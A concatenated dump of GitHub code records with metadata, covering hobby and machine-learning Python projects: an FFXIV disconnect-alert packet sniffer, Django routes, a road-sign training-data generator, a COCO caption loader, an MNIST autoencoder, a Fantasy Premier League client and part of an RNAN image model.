= json.load(json_file)\n", "repo_name": "piaskowyk/enroll-timetable", "sub_path": "config_tools/configuration.py", "file_name": "configuration.py", "file_ext": "py", "file_size_in_byte": 276, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "23766156756", "text": "# ffxiv login server: 204.2.229.9\nimport pyshark\nimport winsound\nimport time\nimport logging\nimport sys\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\n# define human readable names for filters\nFFXIV_LOGIN_SERVER = \"204.2.229.9\"\nfrom_login_server = f\"ip.src=={FFXIV_LOGIN_SERVER}\"\ninitiates_closing_connection = \"tcp.connection.fin_active\"\n\n\ndef sniff_continuously(interface, display_filter):\n logger.info(f\"Listening on interface: {interface}\")\n logger.info(f\"Using display filter: {display_filter}\")\n capture = pyshark.LiveCapture(\n interface=interface,\n display_filter=display_filter\n )\n\n for packet in capture.sniff_continuously():\n # Skip is packet is too small for reconnect\n logger.info(\"Packet arrived, playing audio\")\n logger.debug(packet)\n for i in range(0, 5):\n winsound.PlaySound(\"SystemHand\", winsound.SND_ALIAS)\n time.sleep(1)\n\n\nif __name__ == '__main__':\n sniff_continuously(\n interface=\"Ethernet\",\n display_filter=f\"({from_login_server})&&({initiates_closing_connection})\"\n # display_filter=\"\",\n )\n", "repo_name": "Sillocan/ffxiv-2002-checker", "sub_path": "src/ffxiv-pyshark.py", "file_name": "ffxiv-pyshark.py", "file_ext": "py", "file_size_in_byte": 1170, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 8, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 8, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "pyshark.LiveCapture", "line_number": 20, "usage_type": "call"}, {"api_name": "winsound.PlaySound", "line_number": 30, "usage_type": "call"}, {"api_name": "winsound.SND_ALIAS", "line_number": 30, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "70842863205", "text": "from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.post_home, name='post_home'),\n path('posts/', views.all_posts, name='allposts'),\n path(\"post/new/\", views.create_post, name=\"create_post\"),\n path('members/', views.members, name='members'),\n path('member/new/', views.become_member, name='new_member'),\n path('testimonies/', views.testimonies, name='testimonies'),\n path('testimony/new/', views.create_testimony, name='new_testimony'),\n path('feedbacks/', views.feedbacks, name='feedbacks'),\n path('feedback/new/', views.create_feedback, name='new_feedback'),\n path('about/', views.about, name='about'),\n path('search/', views.search_queries, name='search'),\n]\n", "repo_name": "gabrielstonedelza/food4thought", "sub_path": "f4t/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 726, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "6972069630", "text": "import cv2\nfrom random import randint\nimport xml.etree.cElementTree as ET\nimport numpy as np\nimport random\n\ndef image_genearte(ragne_images,range_sign):\n\titeration = 1\n\tname_folder_images = 'images/'\n\tname_folder_sign = 'allroadsign/'\n\tnormal_folder = 'data_image/'\n\t\n\tnum_range = int(ragne_images / range_sign)\n\tsecond_iteration = 0 \n\titer_sign = 1 \n\n\tfor i in range(range_sign):\n\t\tprint(i)\n\t\tfor j in range(second_iteration,num_range):\t\t\n\t\t\timg_size_annots_h = np.random.random_integers(100,200) \n\t\t\timg_size_annots_w = np.random.random_integers(100,200)\n\t\t\timg_size =(800,800)\n\t\t\timg_size_annots = (img_size_annots_h,img_size_annots_w)\n\t\t\t\n\t\t\timage = cv2.imread(name_folder_images+str(iteration)+'.jpg')\n\t\t\timage_sign = cv2.imread(name_folder_sign+str(iter_sign)+'.jpg')\n\n\t\t\tnew_image = cv2.resize(image,img_size)\n\n\t\t\tnew_image_sign = cv2.resize(image_sign,img_size_annots)\n\n\t\t\tsign = new_image_sign\n\t\t\timage = new_image\n\n\t\t\tradnom_down = np.random.random_integers(200,400) \n\t\t\trandom_raght = np.random.random_integers(200,400) \n\t\t\timage[img_size_annots[0] + radnom_down:img_size_annots[0]+radnom_down+sign.shape[0], img_size_annots[1]+random_raght:img_size_annots[1]+random_raght+sign.shape[1]] = sign \n\t\t\tcv2.imwrite(normal_folder+str(iteration)+'.jpg',image)\n\t\t\t\n\t\t\timg_width,img_height= img_size\n\t\t\timg_depth = 3\n\n\t\t\trectangles = [\n\t\t\timg_size_annots[0] + radnom_down,\n\t\t\timg_size_annots[0] * 2,\n\t\t\timg_size_annots[0],\n\t\t\timg_size_annots[1] * 3\n\t\t\t]\n\t\t\t\n\t\t\tname =str(iteration)+'.jpg'\n\t\t\timg_filename = (name)\n\n\t\t\tname_folder = \"images\"\n\t\t\tpath = \"/home/ostap/Documents/LNU/kiberg/Vision/test/images/\" +str(iteration)+ \".jpg\"\n\t\t\tdatabase = \"Unknown\"\n\t\t\tsegmented = 0\n\t\t\tname_obj = \"stop\"\n\t\t\tpose = \"Unspecified\"\n\t\t\tfruncated = 0\n\t\t\tdifficult = 0\n\t\t\txmin_add = np.random.random_integers(0,10)\n\t\t\tymin_add = np.random.random_integers(0,10)\n\t\t\txmax_add = np.random.random_integers(0,10)\n\t\t\tymax_add = np.random.random_integers(0,10)\n\t\t\txmin = img_size_annots[1] + random_raght + img_size_annots_h + xmin_add\n\t\t\txmax = img_size_annots[1] + random_raght + xmax_add\n\t\t\tymax = img_size_annots[0] + radnom_down + ymax_add\n\t\t\tymin = img_size_annots[0] + radnom_down + img_size_annots_w + ymin_add\n\t\t\tprint(xmin, \"\\t\",ymin,\"\\t\",xmax,\"\\t\",ymax)\n\t\t\tprint(\"==================================\")\n\t\t\twith open(\"data_annots/\"+str(iteration)+\".xml\",\"w+\") as f :\n\t\t\t\tf.write(\"\")\n\t\t\t\tf.write(\"\\n\\t\" + name_folder + \"\")\n\t\t\t\tf.write(\"\\n\\t\" + str(iteration)+ \".jpg\" + \"\")\n\t\t\t\tf.write(\"\\n\\t\" + path + \"\")\t\n\t\t\t\tf.write(\"\\n\\t\")\t\n\t\t\t\tf.write(\"\\n\\t\\t\" + database +\"\")\n\t\t\t\tf.write(\"\\n\\t\")\n\t\t\t\tf.write(\"\\n\\t\")\t\n\t\t\t\tf.write(\"\\n\\t\\t\" + str(img_width) + \"\")\n\t\t\t\tf.write(\"\\n\\t\\t\" + str(img_height) + \"\")\n\t\t\t\tf.write(\"\\n\\t\\t\" + str(img_depth) + \"\")\n\t\t\t\tf.write(\"\\n\\t\")\n\t\t\t\tf.write(\"\\n\\t\" + str(segmented) + \"\")\n\t\t\t\tf.write(\"\\n\\t\")\n\t\t\t\tf.write(\"\\n\\t\\t\" + name_obj + \"\")\t\n\t\t\t\tf.write(\"\\n\\t\\t\" + pose + \"\")\n\t\t\t\tf.write(\"\\n\\t\\t\" + str(fruncated) + \"\")\n\t\t\t\tf.write(\"\\n\\t\\t\" + str(difficult) + \"\")\n\t\t\t\tf.write(\"\\n\\t\\t\")\n\t\t\t\tf.write(\"\\n\\t\\t\\t\" + str(xmin) + \"\")\n\t\t\t\tf.write(\"\\n\\t\\t\\t\" + str(ymin) + \"\")\n\t\t\t\tf.write(\"\\n\\t\\t\\t\" + str(xmax) + \"\")\n\t\t\t\tf.write(\"\\n\\t\\t\\t\" + str(ymax) + \"\")\n\t\t\t\tf.write(\"\\n\\t\\t\")\n\t\t\t\tf.write(\"\\n\\t\")\n\t\t\t\tf.write(\"\\n\") \n\t\t\t\tf.close()\n\t\t\titeration+=1\n\t\t\tnum_range +=1\t\n\t\t\tsecond_iteration +=1\n\t\t\t\n\t\titer_sign +=1\n\nimage_genearte(2000,6)\n\n#print(np.random.random_integers(0,10))\n\n\n\nwith open(\"1.xml\",\"w\") as f:\n\tf.write(r\"101\")\n\tf.write(r\"101\")\n\tf.write(r\"101\")\n\tf.write(r\"101\")\n\nwith open(\"2.xml\",\"w\") as f:\n\tf.write(str(np.random.random_integers(100,200)))\n\tf.write(str(np.random.random_integers(100,200)))\n\tf.write(str(np.random.random_integers(100,200)))\n\tf.write(str(np.random.random_integers(100,200)))\n", "repo_name": "ragnariock/test_test_files_from_sign_stop", "sub_path": "generateImage.py", "file_name": "generateImage.py", "file_ext": "py", "file_size_in_byte": 4055, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.random.random_integers", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random.random_integers", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 35, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 36, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random.random_integers", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 118, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 120, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 121, "usage_type": "attribute"}]} +{"seq_id": "34235483249", "text": "import tensorflow as tf\n\nimport matplotlib.pyplot as plt\n\nimport collections\nimport random\nimport numpy as np\nimport os\nimport time\nimport json\nfrom PIL import Image\n\n\nclass Dataset:\n def __init__(self, annotation_file=None, annotations=None, PATH=None):\n self.annotation_file = annotation_file\n self.PATH = PATH\n self.annotations = annotations\n\n def get_data(self):\n annotation_folder = \"/annotations/\"\n if not os.path.exists(os.path.abspath(\".\") + annotation_folder):\n annotation_zip = tf.keras.utils.get_file(\n \"captions.zip\",\n cache_subdir=os.path.abspath(\".\"),\n origin=\"http://images.cocodataset.org/annotations/annotations_trainval2014.zip\",\n extract=True,\n )\n self.annotation_file = (\n os.path.dirname(annotation_zip) + \"/annotations/captions_train2014.json\"\n )\n os.remove(annotation_zip)\n\n image_folder = \"/train2014/\"\n if not os.path.exists(os.path.abspath(\".\") + image_folder):\n image_zip = tf.keras.utils.get_file(\n \"train2014.zip\",\n cache_subdir=os.path.abspath(\".\"),\n origin=\"http://images.cocodataset.org/zips/train2014.zip\",\n extract=True,\n )\n self.PATH = os.path.dirname(image_zip) + image_folder\n os.remove(image_zip)\n else:\n self.PATH = os.path.abspath(\".\") + image_folder\n\n def group_data(self):\n self.get_data()\n with open(self.annotation_file, \"r\") as f:\n self.annotations = json.load(f)\n image_path_to_caption = collections.defaultdict(list)\n for val in self.annotations[\"annotations\"]:\n caption = f\" {val['caption']} \"\n image_path = self.PATH + \"COCO_train2014_\" + \"%012d.jpg\" % (val[\"image_id\"])\n image_path_to_caption[image_path].append(caption)\n image_paths = list(image_path_to_caption.keys())\n random.shuffle(image_paths)\n train_image_paths = image_paths[:6000]\n print(len(\"Training samples:\", train_image_paths))\n return image_path_to_caption, train_image_paths\n\n def fetch_data(self):\n image_path_to_caption, train_image_paths = self.group_data()\n train_captions = []\n img_name_vector = []\n\n for image_path in train_image_paths:\n caption_list = image_path_to_caption[image_path]\n train_captions.extend(caption_list)\n img_name_vector.extend([image_path] * len(caption_list))\n\n return train_captions, img_name_vector\n\n\nif __name__ == \"__main__\":\n dataset = Dataset()\n train_captions, img_name_vector = dataset.fetch_data()\n print(train_captions[0])\n Image.open(img_name_vector[0])\n", "repo_name": "thisishardik/neural-image-captioning", "sub_path": "dataset/train_loader.py", "file_name": "train_loader.py", "file_ext": "py", "file_size_in_byte": 2821, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.exists", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.get_file", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.get_file", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 50, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 51, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 79, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 79, "usage_type": "name"}]} +{"seq_id": "12356045626", "text": "from __future__ import division, print_function, absolute_import\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nmnist = input_data.read_data_sets(r\"C:\\Users\\tianx\\PycharmProjects\\TensorFlow\\datasets\\data\", one_hot=True)\n\n# mnist 数据集包含 55000 个训练样本, 每个样本为 784 的一维数组, 代表 28 * 28 的图片. 同样的有 10000 个训练数据样本.\n# mnist.train.images.shape: (55000, 784)\n# mnist.test.images.shape: (10000, 784)\n# mnist.validation: \n# print(dir(mnist.train)): 'epochs_completed', 'images', 'labels', 'next_batch', 'num_examples'.\n# print(mnist.train.labels[0]): [0. 0. 0. 0. 0. 0. 0. 1. 0. 0.]\n# print(mnist.train.labels.shape): (55000, 10)\n# mnist.train.next_batch(10) 将迭代地输入 (X,y) 训练样本数组\n\n\nX = tf.placeholder(dtype=tf.float32, shape=(None,784))\n\nw1 = tf.Variable(initial_value=tf.random_normal([784, 256]), dtype=tf.float32)\nb1 = tf.Variable(initial_value=tf.random_normal([256]), dtype=tf.float32)\n\nw2 = tf.Variable(initial_value=tf.random_normal([256, 128]), dtype=tf.float32)\nb2 = tf.Variable(initial_value=tf.random_normal([128]), dtype=tf.float32)\n\nw3 = tf.Variable(initial_value=tf.random_normal([128,256]), dtype=tf.float32)\nb3 = tf.Variable(initial_value=tf.random_normal([256]), dtype=tf.float32)\n\nw4 = tf.Variable(initial_value=tf.random_normal([256,784]), dtype=tf.float32)\nb4 = tf.Variable(initial_value=tf.random_normal([784]), dtype=tf.float32)\n\ndef encode_op(X):\n X1 = tf.nn.sigmoid(tf.add(tf.matmul(X,w1), b1))\n X2 = tf.nn.sigmoid(tf.add(tf.matmul(X1,w2), b2))\n return X2\n\n\ndef decode_op(X2):\n X3 = tf.nn.sigmoid(tf.add(tf.matmul(X2,w3), b3))\n X4 = tf.nn.sigmoid(tf.add(tf.matmul(X3,w4), b4))\n return X4\n\nencode_op = encode_op(X)\ndecode_op = decode_op(encode_op)\ny_predictions = decode_op\ny_true = X\n\n# 求方差\nloss = tf.reduce_mean(tf.pow(y_true - y_predictions, 2))\n\noptimizer = tf.train.RMSPropOptimizer(0.001).minimize(loss)\n\ninit = tf.global_variables_initializer()\n\nsess = tf.Session()\n\nsess.run(init)\n\nfor i in range(1, 20000+1):\n batch_x, _ = mnist.train.next_batch(200)\n\n _, l = sess.run([optimizer, loss], feed_dict={X: batch_x})\n if i % 200 == 0 or i == 1:\n print('Step %i: Minibatch Loss: %f' % (i, l))\n\nn = 4\ncanvas_orig = np.empty((28 * n, 28 * n))\ncanvas_recon = np.empty((28 * n, 28 * n))\nfor i in range(n):\n # MNIST test set\n batch_x, _ = mnist.test.next_batch(n)\n # Encode and decode the digit image\n g = sess.run(decode_op, feed_dict={X: batch_x})\n\n # Display original images\n for j in range(n):\n # Draw the generated digits\n canvas_orig[i * 28:(i + 1) * 28, j * 28:(j + 1) * 28] = batch_x[j].reshape([28, 28])\n # Display reconstructed images\n for j in range(n):\n # Draw the generated digits\n canvas_recon[i * 28:(i + 1) * 28, j * 28:(j + 1) * 28] = g[j].reshape([28, 28])\n\nprint(\"Original Images\")\nplt.figure(figsize=(n, n))\nplt.imshow(canvas_orig, origin=\"upper\", cmap=\"gray\")\nplt.show()\n\nprint(\"Reconstructed Images\")\nplt.figure(figsize=(n, n))\nplt.imshow(canvas_recon, origin=\"upper\", cmap=\"gray\")\nplt.show()\n\n\n\n\n\n\n\n\n", "repo_name": "tianxing1994/TensorFlow", "sub_path": "神经网络练习/自动编码器/auto encoder.py", "file_name": "auto encoder.py", "file_ext": "py", "file_size_in_byte": 3292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tensorflow.examples.tutorials.mnist.input_data.read_data_sets", "line_number": 8, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data", "line_number": 8, "usage_type": "name"}, {"api_name": "tensorflow.placeholder", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 41, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.pow", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.train.RMSPropOptimizer", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}]} +{"seq_id": "33649601339", "text": "import requests\nimport json\nfrom collections import defaultdict\n\nclass FPL_Engine:\n def __init__(self, credentials):\n self.credentials = credentials\n self.teams = self.get_teams()\n self.fixtures = self.get_fixtures()\n self.players = self.get_players()\n self.my_data = self.manager_fpl_data()\n self.data = {}\n self.element_types = self.get_element_types()\n self.starting_lineup, self.bench = self.build_team()\n self.bank = self.my_data['transfers']['bank']\n\n def get_fixtures(self):\n url = self.credentials[\"fixtures_url\"]\n r = requests.get(url)\n json = r.json()\n return json\n\n def get_teams(self):\n url = self.credentials[\"teams_url\"]\n r = requests.get(url)\n json = r.json()\n teams = json['teams']\n self.teams = teams\n return teams\n\n def get_players(self):\n url = self.credentials[\"players_url\"]\n r = requests.get(url)\n json = r.json()\n players = json['elements']\n players_refactor = {}\n for card in players:\n players_refactor[card['id']] = {i:card[i] for i in card if i!='id'}\n\n return players_refactor\n\n\n return players\n\n def get_element_types(self):\n url = self.credentials[\"players_url\"]\n r = requests.get(url)\n json = r.json()\n types = json['element_types']\n types_refactor = {}\n for card in types:\n types_refactor[card['id']] = {i:card[i] for i in card if i!='id'}\n return types_refactor\n\n def get_detailed_player_info(self, player_id):\n url = f'https://fantasy.premierleague.com/api/element-summary/{player_id}/'\n r = requests.get(url)\n json = r.json()\n history = json['history']\n future = json['fixtures']\n return history, future\n\n def manager_fpl_data(self):\n url = self.credentials[\"login_url\"]\n pwd = self.credentials[\"fantasy_pwd\"]\n email = self.credentials[\"email\"]\n redirect_uri = self.credentials[\"redirect_uri\"]\n app_name = self.credentials[\"app_name\"]\n payload = {\n 'password': pwd,\n 'login': email,\n 'redirect_uri': redirect_uri,\n 'app': app_name\n }\n session = requests.session()\n session.post(url, data=payload)\n my_team_url = self.credentials[\"my_team_url\"] + self.credentials[\"manager_id\"] + '/'\n response = session.get(my_team_url)\n json = response.json()\n return json\n\n def build_team(self):\n starting_lineup = []\n bench = []\n print(self.my_data)\n for card in self.my_data['picks']:\n element = card['element']\n player = self.players[element]\n position = player['element_type']\n position_str = self.element_types[position]['singular_name_short']\n first_name = player['first_name']\n last_name = player['second_name']\n selling_price = card['selling_price']\n\n if card['position'] < 12:\n starting_lineup.append([first_name, last_name, position_str, selling_price])\n else:\n bench.append([first_name, last_name, position_str, selling_price])\n\n return starting_lineup, bench\n\n\n\n def display_team(self):\n team = {\"GKP\":\" \", \"DEF\":\" \", \"MID\":\" \", \"FWD\":\" \"}\n for player in self.starting_lineup:\n team[player[2]] += \"-\".join(player[:3]) + \" \"\n print(team[\"GKP\"].center(120), '\\n\\n')\n print(team[\"DEF\"].center(120), '\\n\\n')\n print(team[\"MID\"].center(120), '\\n\\n')\n print(team[\"FWD\"].center(120))\n\n\n\n\n\n\n", "repo_name": "HendoGit/FantasyFootyBot", "sub_path": "project/engine/data_engine.py", "file_name": "data_engine.py", "file_ext": "py", "file_size_in_byte": 3695, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 25, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 33, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 47, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 57, "usage_type": "call"}, {"api_name": "requests.session", "line_number": 75, "usage_type": "call"}]} +{"seq_id": "73203934886", "text": "import torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom model.common import conv, ResAttModuleDownUpPlus\n\n\nclass _ResGroup(nn.Module):\n def __init__(self, n_feats, is_nonlocal=False, use_checkpoint=True):\n super().__init__()\n self.block = ResAttModuleDownUpPlus(n_feats, is_nonlocal, use_checkpoint)\n self.tail = conv(n_feats, n_feats)\n\n def forward(self, x):\n return self.tail(self.block(x))\n\n\nclass RNAN(nn.Module):\n def __init__(self, args):\n super().__init__()\n n_resgroup = args.n_resgroups\n n_feats = args.n_feats\n colors = 3\n out_dim = 120 # MoL\n use_checkpoint = args.checkpoint\n self.stages = args.stages\n # input = lr + masked_hr + mask [+ vq_latent]\n self.head = conv(colors * 2 + 1, n_feats)\n self.fuse = conv(n_feats * 2, n_feats, kernel_size=1, bias=False)\n self.stage_embedding = nn.Embedding(args.stages, n_feats)\n self.body_nl_low = _ResGroup(n_feats, is_nonlocal=True, use_checkpoint=use_checkpoint)\n self.body = nn.ModuleList([_ResGroup(n_feats) for _ in range(n_resgroup - 2)])\n self.body_tail = conv(n_feats, n_feats)\n self.body_nl_high = _ResGroup(n_feats, is_nonlocal=True, use_checkpoint=use_checkpoint)\n self.tail = conv(n_feats, out_dim)\n if args.position_encoding:\n self.position_encoding = nn.Parameter(torch.zeros(args.stages, n_feats))\n else:\n self.position_encoding = None\n\n def apply_position_encoding(self, x):\n if self.position_encoding is not None:\n B, _, H, W = x.size()\n num_patches = H * W // self.stages\n position_encoding = self.position_encoding.view(1, -1, 1).expand(B, -1, num_patches)\n kernel_size = int(np.sqrt(self.stages))\n position_encoding = F.fold(position_encoding, kernel_size=kernel_size, output_size=H, stride=kernel_size)\n return x + position_encoding\n return x\n\n def forward(self, x, stage, prev_hidden):\n feats_shallow = self.head(x)\n feats_shallow = self.apply_position_encoding(feats_shallow)\n feats_shallow = self.fuse(torch.cat([feats_shallow, prev_hidden], dim=1))\n feats_shallow = feats_shallow + self.stage_embedding(stage)[:, :, None, None]\n res = 